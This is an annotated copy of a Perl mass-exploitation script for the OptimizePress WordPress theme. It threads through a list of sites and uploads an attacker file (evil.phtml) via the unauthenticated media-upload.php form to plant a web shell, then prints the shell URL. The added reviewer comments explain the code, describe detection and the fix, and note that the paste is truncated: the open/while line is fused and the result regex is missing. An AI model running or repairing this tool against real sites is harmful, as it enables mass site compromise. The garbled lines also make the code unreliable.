OptimizePress theme exploiter
# NOTE(review): this is a mass-scanning script that abuses an unauthenticated
# file upload in the OptimizePress WordPress theme's
# wp-content/themes/OptimizePress/lib/admin/media-upload.php (see sub ex).
# It is reproduced here for analysis; this copy is truncated by the forum paste
# (line 16 fuses the open() call and the while loop, and the result regex in
# sub ex is missing), so the script does not parse as shown.
# Missing `use strict; use warnings;` - every variable below is a package global.
# Detection: the footprint on a target is a GET followed by a multipart POST to
# the media-upload.php path above, typically from one source against many
# hosts; the mitigation is removing/patching the upload endpoint so it
# requires an authenticated, capability-checked user.
># OptimizePress theme exploiter
# (c) sec4ever.com
use WWW::Mechanize;
use threads;
# Usage check: three arguments (site list, local file to upload, thread count).
# defined() is applied to the whole && chain, so it only reports the last
# operand actually evaluated; a missing argument yields undef and triggers die.
defined($ARGV[0] && $ARGV[1] && $ARGV[2]) ? $file = $ARGV[0] : die "+ usage: perl $0 sites.txt evil.phtml threads\n";
print "[+] sec4ever.com\n";
$evil = $ARGV[1];   # local file name handed to the upload form in sub ex
$thr = $ARGV[2];    # maximum number of concurrently running worker threads
# Truncated in this copy: the open() of the site list (bareword handle 'sites',
# presumably from $file) and the `while ($site = <sites>)` loop header are
# fused into one line. The loop body below reads one host per line.
open(sites,"while($site = )
{
chomp($site);
# Normalise the entry to a bare host (scheme, leading www., trailing / removed).
$site = cleanurl($site);
# One ithread per host; the host is passed as the sole argument to ex().
push(@threads, threads->create (\&ex, $site));
# Throttle: block here until fewer than $thr threads are still running.
sleep(1) while(scalar threads->list(threads::running) >= $thr);
}
# Wait for every worker; eval swallows any error raised by join.
eval {
$_->join foreach @threads;
@threads = ();
};
close(sites);
# Worker thread body: try the upload against one host.
# $_[0] is the cleaned hostname passed from threads->create.
sub ex {
# NOTE: prints the package global $site, not $_[0]; under ithreads this is the
# thread's own copy of the value current at thread creation, so it usually
# matches, but $_[0] is the reliable source.
print " + $site | ";
eval{
# $ex is a package global rather than a lexical; each ithread gets its own copy.
$ex = WWW::Mechanize->new(timeout => 10);
# Request the theme's upload page (the vulnerable endpoint).
$ex->get("http://".$_[0]."/wp-content/themes/OptimizePress/lib/admin/media-upload.php");
# Submit the page's form with id "csimgupload", supplying the local file
# named in $evil for its "newcsimg" field.
$ex->submit_form(
form_id => "csimgupload",
fields => {
newcsimg => $evil
});
};
# Truncated in this copy: the pattern of this regex is missing. The $1 used
# below implies it captures a URL prefix from the response body.
# NOTE: if the eval above died before the object was built (e.g. timeout or
# no such form), $ex is undef here and ->content() dies outside any eval,
# killing this thread.
if($ex->content() =~ /{
print "shell: ".$1.$ARGV[1]."\n";
}else{
print "faild\n";
}
}
# Reduce a site-list entry to a bare host: strip the scheme (and a leading
# "www."), then a single trailing slash. Works on $_[0] directly, so the
# caller's variable is modified in place as well as returned.
sub cleanurl {
# Intended to strip "http(s)://www." but `[www\.]` is a character class:
# `{3}` matches any three characters drawn from 'w' and '.', so inputs such
# as "http://w.w.example.com" are mangled and "http://www2.example.com" is
# not matched here at all. The `? :` with an empty string branch is a
# roundabout way of writing a conditional substitution; the /g on the match
# side only sets pos() and has no effect on the outcome.
$_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g ? $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g : "";
# Strip a bare scheme when there was no "www." prefix.
$_[0] =~ /http[s]?:\/\//g ? $_[0] =~ s/http[s]?:\/\///g : "";
# Drop one trailing slash (the substitution itself is not /m, so `$` here is
# end of string, optionally before a final newline).
$_[0] =~ /[\/]$/m ? $_[0] =~ s/[\/]$// : "";
return $_[0];
}